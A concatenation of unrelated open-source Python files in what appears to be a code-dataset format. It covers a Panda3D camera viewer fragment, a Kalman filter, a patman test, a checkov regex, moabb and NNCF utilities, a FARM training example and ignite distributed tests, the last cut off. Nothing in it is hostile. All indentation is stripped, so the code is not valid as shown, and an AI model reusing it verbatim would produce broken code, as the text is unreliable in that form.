if (vec_1.dot(vec_2) > 0 and vec_1.length() > vec_2.length()) or np.arccos(abs(vec_1.dot(vec_2)) / (vec_1.length() * vec_2.length())) > np.pi / 4:
continue
distance = pow(pow(self.cameraPos[0] - (mins[0] + maxs[0]) / 2, 2) + pow(self.cameraPos[1] - (mins[1] + maxs[1]) / 2, 2) + pow(self.cameraPos[2] - (mins[2] + maxs[2]) / 2, 2), 0.5)
if distance < minDistance:
minDistanceDoor = door
minDistance = distance
pass
continue
if minDistance > 1:
return
mins, maxs = minDistanceDoor.getTightBounds()
if abs(maxs[0] - mins[0]) > abs(maxs[1] - mins[1]):
minsExpected = Vec3(mins[0] - (maxs[1] - mins[1]), mins[1], mins[2])
maxsExpected = Vec3(mins[0], mins[1] + (maxs[0] - mins[0]), maxs[2])
else:
minsExpected = Vec3(mins[0] - (maxs[1] - mins[1]) + (maxs[0] - mins[0]), mins[1] - (maxs[0] - mins[0]), mins[2])
maxsExpected = Vec3(mins[0] + (maxs[0] - mins[0]), mins[1] + (maxs[0] - mins[0]) - (maxs[0] - mins[0]), maxs[2])
pass
minDistanceDoor.setH(minDistanceDoor, 90)
mins, maxs = minDistanceDoor.getTightBounds()
minDistanceDoor.setPos(minDistanceDoor, minsExpected[1] - mins[1], -minsExpected[0] + mins[0], 0)
#print(scene.findAllMatches('doors'))
return
def startChangingView(self):
self.viewChangingProgress = 0
self.prevCameraPos = copy.deepcopy(self.cameraPos)
self.prevTarget = copy.deepcopy(self.target)
self.prevH = self.camera.getR()
if self.viewMode == 'T':
self.newCameraPos = self.startCameraPos
self.newTarget = self.startTarget
self.newH = self.startH
self.viewMode = 'C'
else:
self.newCameraPos = self.topDownCameraPos
self.newTarget = self.topDownTarget
self.newH = self.topDownH
self.startCameraPos = copy.deepcopy(self.cameraPos)
self.startTarget = copy.deepcopy(self.target)
self.startH = self.camera.getR()
self.viewMode = 'T'
pass
return
def changeView(self):
self.cameraPos = []
self.target = []
for c in xrange(3):
self.cameraPos.append(self.prevCameraPos[c] + (self.newCameraPos[c] - self.prevCameraPos[c]) * self.viewChangingProgress)
self.target.append(self.prevTarget[c] + (self.newTarget[c] - self.prevTarget[c]) * self.viewChangingProgress)
continue
self.H = self.prevH + (self.newH - self.prevH) * self.viewChangingProgress
if self.viewChangingProgress + 0.02 >= 1 and self.viewMode == 'C':
ceiling = self.scene.find("**/ceiling")
ceiling.show()
pass
if self.viewChangingProgress <= 0.02 and self.viewMode == 'T':
ceiling = self.scene.find("**/ceiling")
ceiling.hide()
pass
return
def spinCameraTask(self, task):
#print(task.time)
#angleDegrees = task.time * 6.0
movementStep = 0.003
if self.viewChangingProgress <= 1.01:
self.changeView()
self.viewChangingProgress += 0.02
pass
if base.mouseWatcherNode.is_button_down('w'):
for c in xrange(2):
step = movementStep * (self.target[c] - self.cameraPos[c])
self.cameraPos[c] += step
self.target[c] += step
continue
pass
if base.mouseWatcherNode.is_button_down('s'):
for c in xrange(2):
step = movementStep * (self.target[c] - self.cameraPos[c])
self.cameraPos[c] -= step
self.target[c] -= step
continue
pass
if base.mouseWatcherNode.is_button_down('a'):
step = movementStep * (self.target[0] - self.cameraPos[0])
self.cameraPos[1] += step
self.target[1] += step
step = movementStep * (self.target[1] - self.cameraPos[1])
self.cameraPos[0] -= step
self.target[0] -= step
pass
if base.mouseWatcherNode.is_button_down('d'):
step = movementStep * (self.target[0] - self.cameraPos[0])
self.cameraPos[1] -= step
self.target[1] -= step
step = movementStep * (self.target[1] - self.cameraPos[1])
self.cameraPos[0] += step
self.target[0] += step
pass
rotationStep = 0.02
if base.mouseWatcherNode.is_button_down('arrow_left'):
angle = np.angle(complex(self.target[0] - self.cameraPos[0], self.target[1] - self.cameraPos[1]))
angle += rotationStep
self.target[0] = self.cameraPos[0] + np.cos(angle)
self.target[1] = self.cameraPos[1] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_right'):
angle = np.angle(complex(self.target[0] - self.cameraPos[0], self.target[1] - self.cameraPos[1]))
angle -= rotationStep
self.target[0] = self.cameraPos[0] + np.cos(angle)
self.target[1] = self.cameraPos[1] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_up'):
angle = np.arcsin(self.target[2] - self.cameraPos[2])
angle += rotationStep
self.target[2] = self.cameraPos[2] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_down'):
angle = np.arcsin(self.target[2] - self.cameraPos[2])
angle -= rotationStep
self.target[2] = self.cameraPos[2] + np.sin(angle)
pass
angleDegrees = self.angle
angleRadians = angleDegrees * (pi / 180.0)
#self.camera.setPos(2.0 * sin(angleRadians), -2.0 * cos(angleRadians), 3)
self.camera.setPos(self.cameraPos[0], self.cameraPos[1], self.cameraPos[2])
#self.camera.setHpr(angleDegrees, 0, 0)
#self.camera.lookAt(0, 0, 0)
self.camera.lookAt(self.target[0], self.target[1], self.target[2])
self.camera.setR(self.H)
#if base.mouseWatcherNode.hasMouse()
return Task.cont
app = Viewer()
app.run()
|
common/kalman/simple_kalman_old.py | 919bot/Tessa | 114 | 15934 | import numpy as np
class KF1D:
# this EKF assumes constant covariance matrix, so calculations are much simpler
# the Kalman gain also needs to be precomputed using the control module
def __init__(self, x0, A, C, K):
self.x = x0
self.A = A
self.C = C
self.K = K
self.A_K = self.A - np.dot(self.K, self.C)
# K matrix needs to be pre-computed as follow:
# import control
# (x, l, K) = control.dare(np.transpose(self.A), np.transpose(self.C), Q, R)
# self.K = np.transpose(K)
def update(self, meas):
self.x = np.dot(self.A_K, self.x) + np.dot(self.K, meas)
return self.x
|
boot/rpi/tools/patman/func_test.py | yodaos-project/yodaos | 1,144 | 15936 | <filename>boot/rpi/tools/patman/func_test.py
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: GPL-2.0+
#
# Copyright 2017 Google, Inc
#
import contextlib
import os
import re
import shutil
import sys
import tempfile
import unittest
import gitutil
import patchstream
import settings
@contextlib.contextmanager
def capture():
import sys
from cStringIO import StringIO
oldout,olderr = sys.stdout, sys.stderr
try:
out=[StringIO(), StringIO()]
sys.stdout,sys.stderr = out
yield out
finally:
sys.stdout,sys.stderr = oldout, olderr
out[0] = out[0].getvalue()
out[1] = out[1].getvalue()
class TestFunctional(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp(prefix='patman.')
def tearDown(self):
shutil.rmtree(self.tmpdir)
@staticmethod
def GetPath(fname):
return os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])),
'test', fname)
@classmethod
def GetText(self, fname):
return open(self.GetPath(fname)).read()
@classmethod
def GetPatchName(self, subject):
fname = re.sub('[ :]', '-', subject)
return fname.replace('--', '-')
def CreatePatchesForTest(self, series):
cover_fname = None
fname_list = []
for i, commit in enumerate(series.commits):
clean_subject = self.GetPatchName(commit.subject)
src_fname = '%04d-%s.patch' % (i + 1, clean_subject[:52])
fname = os.path.join(self.tmpdir, src_fname)
shutil.copy(self.GetPath(src_fname), fname)
fname_list.append(fname)
if series.get('cover'):
src_fname = '0000-cover-letter.patch'
cover_fname = os.path.join(self.tmpdir, src_fname)
fname = os.path.join(self.tmpdir, src_fname)
shutil.copy(self.GetPath(src_fname), fname)
return cover_fname, fname_list
def testBasic(self):
"""Tests the basic flow of patman
This creates a series from some hard-coded patches build from a simple
tree with the following metadata in the top commit:
Series-to: u-boot
Series-prefix: RFC
Series-cc: <NAME> <<EMAIL>>
Cover-letter-cc: Lord Mëlchett <<EMAIL>>
Series-version: 2
Series-changes: 4
- Some changes
Cover-letter:
test: A test patch series
This is a test of how the cover
leter
works
END
and this in the first commit:
Series-notes:
some notes
about some things
from the first commit
END
Commit-notes:
Some notes about
the first commit
END
with the following commands:
git log -n2 --reverse >/path/to/tools/patman/test/test01.txt
git format-patch --subject-prefix RFC --cover-letter HEAD~2
mv 00* /path/to/tools/patman/test
It checks these aspects:
- git log can be processed by patchstream
- emailing patches uses the correct command
- CC file has information on each commit
- cover letter has the expected text and subject
- each patch has the correct subject
- dry-run information prints out correctly
- unicode is handled correctly
- Series-to, Series-cc, Series-prefix, Cover-letter
- Cover-letter-cc, Series-version, Series-changes, Series-notes
- Commit-notes
"""
process_tags = True
ignore_bad_tags = True
stefan = u'<NAME> <<EMAIL>>'
rick = '<NAME> <<EMAIL>>'
mel = u'<NAME> <<EMAIL>>'
ed = u'Lond Edmund Blackaddër <<EMAIL>'
fred = '<NAME> <<EMAIL>>'
add_maintainers = [stefan, rick]
dry_run = True
in_reply_to = mel
count = 2
settings.alias = {
'fdt': ['simon'],
'u-boot': ['<EMAIL>'],
'simon': [ed],
'fred': [fred],
}
text = self.GetText('test01.txt')
series = patchstream.GetMetaDataForTest(text)
cover_fname, args = self.CreatePatchesForTest(series)
with capture() as out:
patchstream.FixPatches(series, args)
if cover_fname and series.get('cover'):
patchstream.InsertCoverLetter(cover_fname, series, count)
series.DoChecks()
cc_file = series.MakeCcFile(process_tags, cover_fname,
not ignore_bad_tags, add_maintainers,
None)
cmd = gitutil.EmailPatches(series, cover_fname, args,
dry_run, not ignore_bad_tags, cc_file,
in_reply_to=in_reply_to, thread=None)
series.ShowActions(args, cmd, process_tags)
cc_lines = open(cc_file).read().splitlines()
os.remove(cc_file)
lines = out[0].splitlines()
#print '\n'.join(lines)
self.assertEqual('Cleaned %s patches' % len(series.commits), lines[0])
self.assertEqual('Change log missing for v2', lines[1])
self.assertEqual('Change log missing for v3', lines[2])
self.assertEqual('Change log for unknown version v4', lines[3])
self.assertEqual("Alias 'pci' not found", lines[4])
self.assertIn('Dry run', lines[5])
self.assertIn('Send a total of %d patches' % count, lines[7])
line = 8
for i, commit in enumerate(series.commits):
self.assertEqual(' %s' % args[i], lines[line + 0])
line += 1
while 'Cc:' in lines[line]:
line += 1
self.assertEqual('To: <EMAIL>', lines[line])
self.assertEqual('Cc: %s' % stefan.encode('utf-8'), lines[line + 1])
self.assertEqual('Version: 3', lines[line + 2])
self.assertEqual('Prefix:\t RFC', lines[line + 3])
self.assertEqual('Cover: 4 lines', lines[line + 4])
line += 5
self.assertEqual(' Cc: %s' % mel.encode('utf-8'), lines[line + 0])
self.assertEqual(' Cc: %s' % rick, lines[line + 1])
self.assertEqual(' Cc: %s' % fred, lines[line + 2])
self.assertEqual(' Cc: %s' % ed.encode('utf-8'), lines[line + 3])
expected = ('Git command: git send-email --annotate '
'--in-reply-to="%s" --to "<EMAIL>" '
'--cc "%s" --cc-cmd "%s --cc-cmd %s" %s %s'
% (in_reply_to, stefan, sys.argv[0], cc_file, cover_fname,
' '.join(args))).encode('utf-8')
line += 4
self.assertEqual(expected, lines[line])
self.assertEqual(('%s %s, %s' % (args[0], rick, stefan))
.encode('utf-8'), cc_lines[0])
self.assertEqual(('%s %s, %s, %s, %s' % (args[1], fred, rick, stefan,
ed)).encode('utf-8'), cc_lines[1])
expected = '''
This is a test of how the cover
leter
works
some notes
about some things
from the first commit
Changes in v4:
- Some changes
<NAME> (2):
pci: Correct cast for sandbox
fdt: Correct cast for sandbox in fdtdec_setup_memory_size()
cmd/pci.c | 3 ++-
fs/fat/fat.c | 1 +
lib/efi_loader/efi_memory.c | 1 +
lib/fdtdec.c | 3 ++-
4 files changed, 6 insertions(+), 2 deletions(-)
--\x20
2.7.4
'''
lines = open(cover_fname).read().splitlines()
#print '\n'.join(lines)
self.assertEqual(
'Subject: [RFC PATCH v3 0/2] test: A test patch series',
lines[3])
self.assertEqual(expected.splitlines(), lines[7:])
for i, fname in enumerate(args):
lines = open(fname).read().splitlines()
#print '\n'.join(lines)
subject = [line for line in lines if line.startswith('Subject')]
self.assertEqual('Subject: [RFC %d/%d]' % (i + 1, count),
subject[0][:18])
if i == 0:
# Check that we got our commit notes
self.assertEqual('---', lines[17])
self.assertEqual('Some notes about', lines[18])
self.assertEqual('the first commit', lines[19])
|
checkov/common/comment/enum.py | antonblr/checkov | 4,013 | 15941 | import re
COMMENT_REGEX = re.compile(r'(checkov:skip=|bridgecrew:skip=) *([A-Z_\d]+)(:[^\n]+)?')
|
moabb/analysis/__init__.py | plcrodrigues/moabb | 321 | 15991 | <filename>moabb/analysis/__init__.py
import logging
import os
import platform
from datetime import datetime
from moabb.analysis import plotting as plt
from moabb.analysis.meta_analysis import ( # noqa: E501
compute_dataset_statistics,
find_significant_differences,
)
from moabb.analysis.results import Results # noqa: F401
log = logging.getLogger(__name__)
def analyze(results, out_path, name="analysis", plot=False):
"""Analyze results.
Given a results dataframe, generates a folder with
results and a dataframe of the exact data used to generate those results,
aswell as introspection to return information on the computer
parameters
----------
out_path: location to store analysis folder
results: Dataframe generated from Results object
path: string/None
plot: whether to plot results
Either path or results is necessary
"""
# input checks #
if not isinstance(out_path, str):
raise ValueError("Given out_path argument is not string")
elif not os.path.isdir(out_path):
raise IOError("Given directory does not exist")
else:
analysis_path = os.path.join(out_path, name)
unique_ids = [plt._simplify_names(x) for x in results.pipeline.unique()]
simplify = True
print(unique_ids)
print(set(unique_ids))
if len(unique_ids) != len(set(unique_ids)):
log.warning("Pipeline names are too similar, turning off name shortening")
simplify = False
os.makedirs(analysis_path, exist_ok=True)
# TODO: no good cross-platform way of recording CPU info?
with open(os.path.join(analysis_path, "info.txt"), "a") as f:
dt = datetime.now()
f.write("Date: {:%Y-%m-%d}\n Time: {:%H:%M}\n".format(dt, dt))
f.write("System: {}\n".format(platform.system()))
f.write("CPU: {}\n".format(platform.processor()))
results.to_csv(os.path.join(analysis_path, "data.csv"))
stats = compute_dataset_statistics(results)
stats.to_csv(os.path.join(analysis_path, "stats.csv"))
P, T = find_significant_differences(stats)
if plot:
fig, color_dict = plt.score_plot(results)
fig.savefig(os.path.join(analysis_path, "scores.pdf"))
fig = plt.summary_plot(P, T, simplify=simplify)
fig.savefig(os.path.join(analysis_path, "ordering.pdf"))
|
tools/add_new_quantization_parameters.py | xiao1228/nncf | 310 | 16000 | """
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
from argparse import ArgumentParser
from typing import NamedTuple, Any
import torch
from os import listdir, makedirs
from os.path import isfile, join, exists
from shutil import copyfile
from nncf.torch.quantization.layers import SymmetricQuantizer, AsymmetricQuantizer
class ParameterToAdd(NamedTuple):
name: str
value: Any
def main(argv):
parser = ArgumentParser()
parser.add_argument('-i', '--input-folder', help='Path to directory with given checkpoints to modify',
required=True)
parser.add_argument('-o', '--output-folder', help='Path to directory to save modified checkpoints', required=True)
parser.add_argument('-b', '--bitwidth', help='Bitwidth to initialize quantizer',
required=False, default=8, type=int)
parser.add_argument('-v', '--verbose', help='Print all new names of parameters', required=False,
action='store_true')
args = parser.parse_args(args=argv)
src_dir = args.input_folder
dst_dir = args.output_folder
if not exists(dst_dir):
makedirs(dst_dir)
param_list = [ParameterToAdd('_num_bits', torch.IntTensor([args.bitwidth])),
ParameterToAdd('enabled', torch.IntTensor([1]))]
pth_files = [(join(src_dir, f), join(dst_dir, f)) for f in listdir(src_dir) if
isfile(join(src_dir, f)) and ('.pth' in f or '.sd' in f)]
files_to_copy = []
for pair in pth_files:
src_file, dst_file = pair
if 'binarization' in src_file:
files_to_copy.append(pair)
continue
sd = pth = torch.load(src_file)
if 'state_dict' in pth:
sd = pth['state_dict']
hooks = [SymmetricQuantizer.SCALE_PARAM_NAME, AsymmetricQuantizer.INPUT_LOW_PARAM_NAME]
new_keys = {}
for new_parameter in param_list:
old_keys = list(sd.keys())
for k in sd.keys():
for h in hooks:
new_key = k.replace(h, new_parameter.name)
if ('.' + h in k) and ('.' + new_parameter.name not in k) and (new_key not in old_keys):
new_keys[new_key] = new_parameter.value
if new_keys:
print(f'\nAdding #{len(new_keys)} of new keys')
if args.verbose:
print('New keys:', new_keys, sep='\n')
for new_key, value in new_keys.items():
sd[new_key] = value
pth['state_dict'] = sd
torch.save(pth, dst_file)
else:
files_to_copy.append(pair)
for src_file, dst_file in files_to_copy:
print("\nCopying {}".format(dst_file))
copyfile(src_file, dst_file)
if __name__ == '__main__':
main(sys.argv[1:])
|
examples/passage_ranking.py | skirdey/FARM | 1,551 | 16018 | # fmt: off
import logging
from pathlib import Path
from farm.data_handler.data_silo import DataSilo
from farm.data_handler.processor import RegressionProcessor, TextPairClassificationProcessor
from farm.experiment import initialize_optimizer
from farm.infer import Inferencer
from farm.modeling.adaptive_model import AdaptiveModel
from farm.modeling.language_model import LanguageModel
from farm.modeling.prediction_head import RegressionHead, TextClassificationHead
from farm.modeling.tokenization import Tokenizer
from farm.train import Trainer
from farm.utils import set_all_seeds, MLFlowLogger, initialize_device_settings, reformat_msmarco_train, reformat_msmarco_dev, write_msmarco_results
from farm.evaluation.msmarco_passage_farm import msmarco_evaluation
def text_pair_classification():
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO)
ml_logger = MLFlowLogger(tracking_uri="https://public-mlflow.deepset.ai/")
ml_logger.init_experiment(experiment_name="Public_FARM", run_name="Run_text_pair_classification")
##########################
########## Settings
##########################
set_all_seeds(seed=42)
device, n_gpu = initialize_device_settings(use_cuda=True)
n_epochs = 2
batch_size = 64
evaluate_every = 500
lang_model = "bert-base-cased"
label_list = ["0", "1"]
train_filename = "train.tsv"
dev_filename = "dev_200k.tsv"
# The source data can be found here https://github.com/microsoft/MSMARCO-Passage-Ranking
generate_data = False
data_dir = Path("../data/msmarco_passage")
predictions_raw_filename = "predictions_raw.txt"
predictions_filename = "predictions.txt"
train_source_filename = "triples.train.1m.tsv"
qrels_filename = "qrels.dev.tsv"
queries_filename = "queries.dev.tsv"
passages_filename = "collection.tsv"
top1000_filename = "top1000.dev"
# 0. Preprocess and save MSMarco data in a format that can be ingested by FARM models. Only needs to be done once!
# The final format is a tsv file with 3 columns (text, text_b and label)
if generate_data:
reformat_msmarco_train(data_dir / train_source_filename,
data_dir / train_filename)
reformat_msmarco_dev(data_dir / queries_filename,
data_dir / passages_filename,
data_dir / qrels_filename,
data_dir / top1000_filename,
data_dir / dev_filename)
# 1.Create a tokenizer
tokenizer = Tokenizer.load(
pretrained_model_name_or_path=lang_model,
do_lower_case=False)
# 2. Create a DataProcessor that handles all the conversion from raw text into a pytorch Dataset
# Evaluation during training will be performed on a slice of the train set
# We will be using the msmarco dev set as our final evaluation set
processor = TextPairClassificationProcessor(tokenizer=tokenizer,
label_list=label_list,
metric="f1_macro",
train_filename=train_filename,
test_filename=None,
dev_split=0.001,
max_seq_len=128,
data_dir=data_dir,
delimiter="\t")
# 3. Create a DataSilo that loads several datasets (train/dev/test), provides DataLoaders for them and calculates a few descriptive statistics of our datasets
data_silo = DataSilo(
processor=processor,
batch_size=batch_size)
# 4. Create an AdaptiveModel
# a) which consists of a pretrained language model as a basis
language_model = LanguageModel.load(lang_model)
# b) and a prediction head on top that is suited for our task
prediction_head = TextClassificationHead(num_labels=len(label_list),
class_weights=data_silo.calculate_class_weights(
task_name="text_classification"),
)
model = AdaptiveModel(
language_model=language_model,
prediction_heads=[prediction_head],
embeds_dropout_prob=0.1,
lm_output_types=["per_sequence_continuous"],
device=device)
# 5. Create an optimizer
model, optimizer, lr_schedule = initialize_optimizer(
model=model,
learning_rate=1e-5,
device=device,
n_batches=len(data_silo.loaders["train"]),
n_epochs=n_epochs)
# 6. Feed everything to the Trainer, which keeps care of growing our model into powerful plant and evaluates it from time to time
trainer = Trainer(
model=model,
optimizer=optimizer,
data_silo=data_silo,
epochs=n_epochs,
n_gpu=n_gpu,
lr_schedule=lr_schedule,
evaluate_every=evaluate_every,
device=device)
# 7. Let it grow
trainer.train()
# 8. Hooray! You have a model. Store it:
save_dir = Path("saved_models/passage_ranking_model")
model.save(save_dir)
processor.save(save_dir)
# 9. Load it & harvest your fruits (Inference)
# Add your own text adapted to the dataset you provide
model = Inferencer.load(save_dir, gpu=True, max_seq_len=128, batch_size=128)
result = model.inference_from_file(data_dir / dev_filename)
write_msmarco_results(result, save_dir / predictions_raw_filename)
msmarco_evaluation(preds_file=save_dir / predictions_raw_filename,
dev_file=data_dir / dev_filename,
qrels_file=data_dir / qrels_filename,
output_file=save_dir / predictions_filename)
model.close_multiprocessing_pool()
if __name__ == "__main__":
text_pair_classification()
# fmt: on
|
tests/ignite/distributed/comp_models/test_native.py | Eunjnnn/ignite | 4,119 | 16022 | import os
import pytest
import torch
import torch.distributed as dist
from ignite.distributed.comp_models import has_native_dist_support
if not has_native_dist_support:
pytest.skip("Skip if no native dist support", allow_module_level=True)
else:
from ignite.distributed.comp_models.native import _expand_hostlist, _NativeDistModel, _setup_ddp_vars_from_slurm_env
# tests from https://github.com/LLNL/py-hostlist/blob/master/hostlist/unittest_hostlist.py
@pytest.mark.parametrize(
"hostlist, expected",
[
("localhost", "localhost"),
("compute!:b24_[1-2].r", "compute!:b24_1.r,compute!:b24_2.r"),
("quartz[4-8]", "quartz4,quartz5,quartz6,quartz7,quartz8"),
("c1001a-[11,17]", "c1001a-11,c1001a-17"),
("c1001a-s[11,17]", "c1001a-s11,c1001a-s17"),
("c1009a-s17,c1010a-s11", "c1009a-s17,c1010a-s11"),
(
"gpu-compute-on-demand-dy-g4dnxlarge-[1-4]",
"gpu-compute-on-demand-dy-g4dnxlarge-1,"
"gpu-compute-on-demand-dy-g4dnxlarge-2,"
"gpu-compute-on-demand-dy-g4dnxlarge-3,"
"gpu-compute-on-demand-dy-g4dnxlarge-4",
),
(
"node[18-19,1-16,21-22]",
"node1,node2,node3,node4,node5,"
"node6,node7,node8,node9,node10,"
"node11,node12,node13,node14,node15,"
"node16,node18,node19,node21,node22",
),
(
"node[4-8,12,16-20,22,24-26]",
"node4,node5,node6,node7,node8,"
"node12,node16,node17,node18,"
"node19,node20,node22,node24,"
"node25,node26",
),
("machine2-[02-4]vm1", "machine2-02vm1,machine2-03vm1,machine2-04vm1"),
(
"machine2-[02-3]vm1, machine4-[0003-5].vml2",
"machine2-02vm1,machine2-03vm1,machine4-0003.vml2,machine4-0004.vml2,machine4-0005.vml2",
),
("machine2-[009-11]vm1", "machine2-009vm1,machine2-010vm1,machine2-011vm1"),
("node[1,2,3]", "node1,node2,node3"),
(
"compute-b24-[1-3,5-9], compute-b25-[1,4,8],compute-b25-[2-9,13]",
"compute-b24-1,compute-b24-2,compute-b24-3,compute-b24-5,compute-b24-6,"
"compute-b24-7,compute-b24-8,compute-b24-9,compute-b25-1,compute-b25-4,"
"compute-b25-8,compute-b25-2,compute-b25-3,compute-b25-4,compute-b25-5,"
"compute-b25-6,compute-b25-7,compute-b25-8,compute-b25-9,compute-b25-13",
),
],
)
def test_expand_hostlist(hostlist, expected):
assert _expand_hostlist(hostlist) == expected.split(",")
def test_expand_hostlist_invalid():
with pytest.raises(ValueError, match=r"hostlist invalid"):
_expand_hostlist("invalid[]")
@pytest.mark.distributed
def test__native_dist_model():
available_backends = _NativeDistModel.available_backends
if dist.is_nccl_available():
assert "nccl" in available_backends
else:
assert "nccl" not in available_backends
if dist.is_gloo_available():
assert "gloo" in available_backends
else:
assert "gloo" not in available_backends
if dist.is_mpi_available():
assert "mpi" in available_backends
else:
assert "mpi" not in available_backends
with pytest.raises(ValueError, match=r"Backend should be one of"):
_NativeDistModel.create_from_backend("abc")
@pytest.mark.distributed
@pytest.mark.skipif(not dist.is_nccl_available(), reason="Skip if nccl not available")
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_nccl_but_no_gpu(mock_gpu_is_not_available):
with pytest.raises(RuntimeError, match=r"Nccl backend is required but no cuda capable devices"):
_NativeDistModel(backend="nccl")
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_dist_model_create_from_backend_bad_config():
import os
from datetime import timedelta
os.environ["RANK"] = "1"
with pytest.raises(RuntimeError, match=r"PyTorch distributed configuration should define env variables"):
_NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
del os.environ["RANK"]
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
def test__native_dist_model_create_from_backend_bad_slurm_config():
import os
from datetime import timedelta
os.environ["SLURM_JOB_ID"] = "1"
with pytest.raises(RuntimeError, match=r"SLURM distributed configuration is missing"):
_NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
with pytest.raises(ValueError, match=r"Arguments rank and world_size should not be specified with SLURM"):
_NativeDistModel.create_from_backend(
backend="gloo", timeout=timedelta(seconds=10), rank=1, init_method="", world_size=1
)
os.environ["SLURM_PROCID"] = "0"
os.environ["SLURM_LOCALID"] = "0"
os.environ["SLURM_NTASKS"] = "1"
os.environ["SLURM_JOB_NODELIST"] = "localhost"
os.environ["SLURM_JOB_NUM_NODES"] = "1"
os.environ["RANK"] = "1"
with pytest.warns(UserWarning, match=r"We detected the following env variables"):
model = _NativeDistModel.create_from_backend(backend="gloo", timeout=timedelta(seconds=10))
model.finalize()
del os.environ["SLURM_JOB_ID"]
del os.environ["SLURM_PROCID"]
del os.environ["SLURM_LOCALID"]
del os.environ["SLURM_NTASKS"]
del os.environ["SLURM_JOB_NODELIST"]
del os.environ["SLURM_JOB_NUM_NODES"]
del os.environ["RANK"]
def _assert_model(model, true_conf):
assert model.device() == torch.device(true_conf["device"])
assert model.get_local_rank() == true_conf["local_rank"]
assert model.get_rank() == true_conf["rank"]
assert model.get_world_size() == true_conf["world_size"]
assert model.get_node_rank() == true_conf["node_index"]
assert model.get_nnodes() == true_conf["nnodes"]
assert model.get_nproc_per_node() == true_conf["nproc_per_node"]
def _test__native_dist_model_create_from_backend_no_dist(backend, true_device):
from datetime import timedelta
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timedelta(seconds=20))
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
_assert_model(
model,
{
"device": true_device,
"local_rank": 0,
"rank": 0,
"world_size": 1,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": 1,
},
)
model.finalize()
def _test__native_dist_model_create_from_backend_dist(init_method, local_rank, rank, world_size, backend, true_device):
import os
from datetime import timedelta
timeout = timedelta(seconds=20)
os.environ["RANK"] = f"{rank}"
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timeout, init_method=init_method)
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
with pytest.raises(RuntimeError, match=r"Can not create new distributed process group if default one is"):
_NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
_assert_model(
model,
{
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
},
)
if init_method is None:
assert model._init_method == "env://"
else:
assert model._init_method == init_method
model.finalize()
del os.environ["RANK"]
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
assert "RANK" not in os.environ
def _test__native_dist_model_create_from_backend_slurm(local_rank, rank, world_size, backend, true_device):
import os
from datetime import timedelta
timeout = timedelta(seconds=20)
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
del os.environ["WORLD_SIZE"]
del os.environ["LOCAL_RANK"]
os.environ["SLURM_JOB_ID"] = "15000"
os.environ["SLURM_PROCID"] = str(rank)
os.environ["SLURM_LOCALID"] = str(local_rank)
os.environ["SLURM_NTASKS"] = str(world_size)
os.environ["SLURM_JOB_NODELIST"] = "localhost"
os.environ["SLURM_JOB_NUM_NODES"] = "1"
model = _NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
with pytest.raises(RuntimeError, match=r"Can not create new distributed process group if default one is"):
_NativeDistModel.create_from_backend(backend=backend, timeout=timeout)
_assert_model(
model,
{
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
},
)
model.finalize()
del os.environ["SLURM_JOB_ID"]
del os.environ["SLURM_PROCID"]
del os.environ["SLURM_LOCALID"]
del os.environ["SLURM_NTASKS"]
del os.environ["SLURM_JOB_NODELIST"]
del os.environ["SLURM_JOB_NUM_NODES"]
assert "MASTER_ADDR" not in os.environ
assert "MASTER_PORT" not in os.environ
assert "RANK" not in os.environ
os.environ["WORLD_SIZE"] = str(world_size)
os.environ["LOCAL_RANK"] = str(local_rank)
def _test__native_dist_model_create_from_context_no_local_rank():
if "LOCAL_RANK" in os.environ:
del os.environ["LOCAL_RANK"]
from ignite.distributed.comp_models.base import ComputationModel
if ComputationModel._ext_local_rank is not None:
ComputationModel._ext_local_rank = None
with pytest.warns(UserWarning, match=r"Local rank information for native distributed setting will be initialized"):
_NativeDistModel.create_from_context()
def _test__native_dist_model_create_from_context_env_local_rank(true_conf):
import os
remove_lrank = False
if "LOCAL_RANK" not in os.environ:
os.environ["LOCAL_RANK"] = str(true_conf["local_rank"])
remove_lrank = True
model = _NativeDistModel.create_from_context()
_assert_model(model, true_conf)
if remove_lrank:
del os.environ["LOCAL_RANK"]
def _test__native_dist_model_create_from_context_set_local_rank(true_conf):
from ignite.distributed.comp_models.base import ComputationModel
lrank = None
if "LOCAL_RANK" in os.environ:
lrank = os.environ["LOCAL_RANK"]
del os.environ["LOCAL_RANK"]
ComputationModel._ext_local_rank = true_conf["local_rank"]
model = _NativeDistModel.create_from_context()
_assert_model(model, true_conf)
